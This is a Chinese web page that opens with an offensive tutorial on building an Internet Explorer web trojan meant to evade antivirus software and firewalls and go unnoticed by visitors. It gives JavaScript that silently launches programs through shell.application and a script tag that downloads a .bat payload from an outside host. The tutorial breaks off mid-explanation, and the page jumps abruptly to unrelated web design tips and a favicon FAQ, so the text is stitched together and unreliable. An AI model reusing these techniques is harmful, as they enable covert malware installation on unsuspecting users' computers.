打造完美的IE网页木马

　　既然要打造完美的ＩＥ网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：

　　一：可以躲过杀毒软件的追杀；

　　二：可以避开网络防火墙的报警；

　　三：能够适用于多数的ＷＩＮＤＯＷＳ操作系统（主要包括ＷＩＮ９８、ＷＩＮＭＥ、ＷＩＮ２０００、ＷＩＮＸＰ、ＷＩＮ２００３）中的多数ＩＥ版本（主要包括ＩＥ５．０、ＩＥ５．５、ＩＥ６．０），最好能打倒ＳＰ补丁；

　　四：让浏览者不容易发觉ＩＥ变化，即可以悄无声息，从而可以长久不被发现。
　　（注意以上四点只是指网页本身而言，但不包括你的木马程序，也就是说我们的网页木马只是负责运行指定的木马程序，至于你的木马程序的好坏只有你自己去选择啦！别找我要，我不会写的哦！）

　　满足以上四点我想才可以让你的马儿更青春更长久，跑的更欢更快……

　　看了上面的几点你是不是心动拉？别急，我们还是先侃侃现有的各种ＩＥ网页木马的不足吧！

　　第一种：利用古老的MIME漏洞的ＩＥ网页木马这种木马现在还在流行，但因为此漏洞太过古老且适用的ＩＥ版本较少，而当时影响又太大，补丁差不多都补上啦，因此这种木马的种植成功率比较低。

　　第二种：利用com.ms.activeX.ActiveXComponent漏洞，结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数ＩＥ版本中，是一个比较好的漏洞，利用价值非常高，但却因为它结合了流行的病毒调用的ＷＳＨ及ＦＳＯ控件，使其虽说可以避开网络防火墙的报警，可逃不脱杀毒软件的追捕（如诺顿）。

　　第三种：利用OBJECT对象类型确认漏洞（Ｏｂｊｅｃｔ　Ｄａｔａ　Ｒｅｍｏｔｅ）并结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马（典型的代表有动鲨网页木马生成器）

　　此种木马最大的优点是适应的ＩＥ版本多，且漏洞较新，但却有如下不足：

　　１、因为此漏洞要调用Mshta.exe来访问网络下载木马程序，所以会引起防火墙报警（如天网防火墙）；

　　２、如果此ＩＥ网页木马又利用了ＷＳＨ及ＦＳＯ控件，同样逃不脱杀毒软件的追捕（如诺顿），而动鲨网页木马又恰恰使用了ＷＳＨ及ＦＳＯ控件，叹口气……可惜呀……？

　　３、再有就是这个漏洞需要网页服务器支持动态网页如ＡＳＰ、ＪＳＰ、ＣＧＩ等，这就影响了它的发挥，毕竟现在的免费稳定的动态网页空间是少之又少；虽说此漏洞也可利用邮件ＭＩＭＥ的形式（见我在安全焦点上发表的文章：《由错误MIME漏洞的利用想到的......---IE Object Data 数据远程执行漏洞的利用》http://www.xfocus.net/articles/200309/607.html）来利用，但经测试发现对ＩＥ６．０不起作用。

　　看到上面的分析你是不是有了这种感觉：千军易得，一将难求，马儿成群，奈何千里马难寻！别急，下面让我带这大家一起打造我心中的完美ＩＥ网页木马。

　　首先要躲过杀毒软件的追杀，我们就不能利用ＷＳＨ和ＦＳＯ控件，因为只要利用了ＷＳＨ和ＦＳＯ控件就一定逃不脱“诺顿”的追杀，这可叫我们该如何是好？！别急，经过我的努力工作（说真的我也是在研究ＡＳＰ木马时偶然发现的灵感）终于我有找到了一个可以用的控件，那就是shell.application，并且它可是经过了安全认证的，可以在“我的电脑”域中的网页中畅通无阻的执行，比ＷＳＨ和ＦＳＯ更容易得到执行权限（利用跨域漏洞即可），请看下面javascript代码：

＜SCRIPT LANGUAGE="javascript" type="text/javascript"＞
var shell=new ActiveXObject("shell.application");
shell.namespace("c:\Windows\").items().item("Notepad.exe").invokeverb();
＜/SCRIPT＞

　　保存为test.htm后打开看是否自动打开了记事本程序，而且不会象ＷＳＨ和ＦＳＯ那样出现是否允许运行的提示框，是不是有点兴趣啦？现在我们已可以运行所有已知路径的程序，但我们要求运行我们自己的木马程序，所以还要求把我们的木马程序下载到浏览者的电脑上并找出它的位置。我们一个个来解决：

　　１、下载木马程序到浏览者的电脑中

　　这一点可以有很多解决方法，比如我以前提到的ＷＩＮＤＯＷＳ帮助文件访问协议下载任意文件漏洞（its:），不过这次我们不用它，再教大家两个更好的下载方法：

　　例一：利用SCRIPT标签，代码如下：

＜SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"＞＜/SCRIPT＞

　　十要：

　　第一：要认真规划和分析。这是网页设计灵魂工作。创建站点之前，要明确你的网站主要针对哪些访问者，为哪些用户服务，要把握准主页题材

　　第二：网页要易读。这就意味着，你必须花点心思来规划文字与背景颜色的搭配方案。注意不要使背景的颜色冲淡了文字的视觉效果，别用花里胡哨的色彩组合，让人看起你的网页来很费劲。这个原则也意味着，你最好别把文字的规格设得太小、也不能太大。文字太小，人家读起来难受；文字太大，或者文字视觉效果变化频繁，像是冲着人大喊大叫，看起来不舒服。

　　第三：网站导航要清晰。所有的超链接应清晰无误地向读者标识出来，所有导航性质的设置，像图像按钮，都要有清晰的标识，让人看得明白，千万别光顾视觉效果的热闹的，而让人家不知东西南北。 　　第四：网页风格要统一。其实，这个原则和传统的印刷出版物没什么区别。你网页上所有的图像、文字，包括像背景颜色、区分线、字体、标题、注脚什么的，都要统一风格，贯穿全站。这样子读者看起来舒服、顺畅，会对你的网站留下一个“很专业”的印象。很多缺乏编辑、出版背景的网友，很容易忽视这点，特别是网页一多，更容易忘。

　　第五：要给用户选择的权利。应当充分考虑他们的需求，网页要允许那些大款或在公司上网的人欣赏复杂的Flash或VRML,也要允许那些囊中羞涩的自费上网者选择简单的HTML或纯文本格式。一个奇怪的现象是，尽管很多人都知道在网站上放一份纯文本版的重要性，但很少有人这样做。

　　第六：网页要有交互性，也称之为互动性，是网站设计至关重要的一环。 网络给我们提供了前所未有的交流条件，我们就没有理由不让用户发表意见。我认为，在每一页加上留言簿和E-mail链接，是对一个网站最基本的要求。

　　第七：要充分发挥ALT标签的作用。这看似简单的技术，几乎是衡量一个网站制作是否认真的基本标准。这样做可以在图片未显示出来时，访问者就可以知道这幅图是完成什么功能，或是完成什么链接，能起来一种加快网页浏览速度的作用。

　　第八：要定期核实超级链接的正确性。对于那些页面中有链接其它站点内容的网页，更要定时、全面核实，否则你会失去很多经常访问你站点的“老客户”的。

　　第九：要尝试使用不同环境下的浏览器检验您的网页。用尽可能多的环境下的浏览器检验您的网页，或者让朋友们在不同的机器上读读您的网页。最起码要保证ＰＣ下的ＩＥ和Ｎｅｔｓｃａｐｅ，以及Ｕｎｉｘ下的Ｎｅｔｓｃａｐｅ能满意显示您的网页。

　　第十：要及时更新和维护。网站建设起来，只是一个新的起点，你更要细心照料， 并不断更新，以保持其常有的新鲜，若不能及时更新，也最好在主页上发布信息，告诉你的朋友，我要离开一段时间，未能及时给你回复，希望见谅。否则形同“死站”， 让人以为你对他的信不屑一顾，更不会和你继续往来了。

   十不要：

　　一不要使用巨幅的或过多的图形。目前网客上网的一个最主要目的就是寻找信息，速度越快越好，“赏心悦目”决不是您网页的主要设计目标。一些必须的照片或图画可制成单独的链接以分流主页的大小。记住∶过多的图形意味着访问者必须多次连接Ｓｅｒｖｅｒ，严重影响网络速度。

　　二不要使用闪烁的图形或文字。闪烁的图形和文字容易引起流览者的注意，被广告商们普遍应用。正因如此，也引起了广大网客极端反感，多数人反应闪烁的图形和文字不仅刺激眼睛，让人不舒服，而且也分散人的注意力，非常影响阅读。另外，闪烁的图形也会极大地降低网络速度。

　　三不要每页的内容过多。必要的分类与分页不仅有助于阅读，也能有效减低每一页的读取时间，易受网客欢迎。一般的网客在一个网页只会停留极短的时间，若您的一个网页有几页长，您就该考虑分成几个链接，争取把最主要的内容放在首页。

　　四不要出现错别字、病句。这条禁忌似乎人人知道，但就是有很多很多站点有这些毛病。原因主要是做这些站点的人，大多是技术出身，以为网站就是展示技术能力的场所，实际上，网站迄今为止的基本功用应该是信息传播，应该比照媒体、出版的专业规范来，应该由专业编辑来处理。任何事情总有利弊两面，互联网技术的普及可以让每个人可以自由地创办自己的“媒体”，同时也给互联网世界增添了无数水准低下、制作粗劣的东西。

　　五不要使用自动的强迫性ｐｏｐˉｕｐ窗口。许多站长爱在网页中加入一些ｓｃｒｉｐｔ，以使进入（或退出）该网页的浏览器自动产生另一窗口，这是一种极让人反感的作法，多数网客讨厌被迫执行这种命令。若是当网客主动进入赞助商的网页时，另外产生的窗口则能普遍被人接受。

　　六不要过多装饰。网页设计者们常常喜欢使用各种漂亮的小“摆设”来装饰网页，但过多的装饰不仅影响网络速度，更容易引起读者华而不实的感觉。网客们越来越注重的是内容而不是华丽。所以除非您想展示您的审美观，不要为了华美而忽视速度。

　　七不要轻易使用最新的网页功能。不要为了个人兴趣而去使用某些浏览器的最新的功能，这不仅可能让许多访问者在读您的网页时遇到Ｂｕｇ，也为您将来的维护增添麻烦。目前您的网页最好能面向IE3.0和Netscape3.0，这样您的网页会和几乎所有的网客的浏览器兼容。

　　八不要尝试使用使用ＪＡＶＡ或ＪＡＶＡＳｃｒｉｐｔ。ＪＡＶＡ的调用一般比文字慢许多，而它对于以信息为主的网页来说用途极小。

　　问：我将有些网站添加到收藏夹时，会看到这个图站在收藏夹中会显示出特别的图标。我也想在网页上加入代表我个人主页的标志，请问这种图标是如何实现的？

　　答：Internet Explorer 5.0提供了一个新的功能，就是可以让网页设计者自己设计网站URL的图标。也就是在Internet Explorer地址栏前面，以及在收藏夹里面，显示的是你自己设计的图标，而不是默认的Internet Explorer图标。要能够在网址栏中显示自己的图标，要以下几个步骤:
首先要做出你自己的图标。你可以用任何一种图形设计程序来制作你的图标，或是你可以从图库、网络等地方找到你要的图标，这个图标的大小必须是16×16像素，否则可能会显示不出来。虽然Internet Explorer规定是一定要用16×16的大小，但是笔者发现用32 x 32的大小也可以。

　　接下来，就要把图标链接到网页中了，链接图标可以有两种方法来实现。

　　第一种方法:你把你的图标文件名取为favicon.ico，并且放在你网页所在的根目录下，就是跟你首页文件(一般是index.htm、index.html、default.htm或default.html放在一起)。这样Internet Explorer 5.0就会自动读取这个favicon.ico，从而将这个图标显示出来。

　　第二种方法:在首页HTML文件中，加入link命令，<link>是放在<head>与</head>之间，例如下面这样:

<HEAD>
<LINK REL="SHORTCUT ICON" HREF="http:///youricon.ico">
<TITLE>网页教学网--专业的网页教学站点</TITLE>
</HEAD>

　　其中的"HREF=http:///youricon.ico>"只是一个例子，你只要将"http://"替换成你的网址，将"youricon.ico"替换成你制作的ICO文件名即可。这样只有当网友把你的网站加到Internet Explorer的收藏夹中，并重新打开Internet Explorer浏览器之后，你自行制作的图标才会显示出来。

　　小提示:如果你不要你的Internet Explorer在收藏夹中出现这些网站自行制作的图标，在加入收藏夹之后，做清除History的操作。然后再重新打开Internet Explorer浏览器之后，这些自行制作的图标就会消失，恢复成Internet Explorer默认的图标。